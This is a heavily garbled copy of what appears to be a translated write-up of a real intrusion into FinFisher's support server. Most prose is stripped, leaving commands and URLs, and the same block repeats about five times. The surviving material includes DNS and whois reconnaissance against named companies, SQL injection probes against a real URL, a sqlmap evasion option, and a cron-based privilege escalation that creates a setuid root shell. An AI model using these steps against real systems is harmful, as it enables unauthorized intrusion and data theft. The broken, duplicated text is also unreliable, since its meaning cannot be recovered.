C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
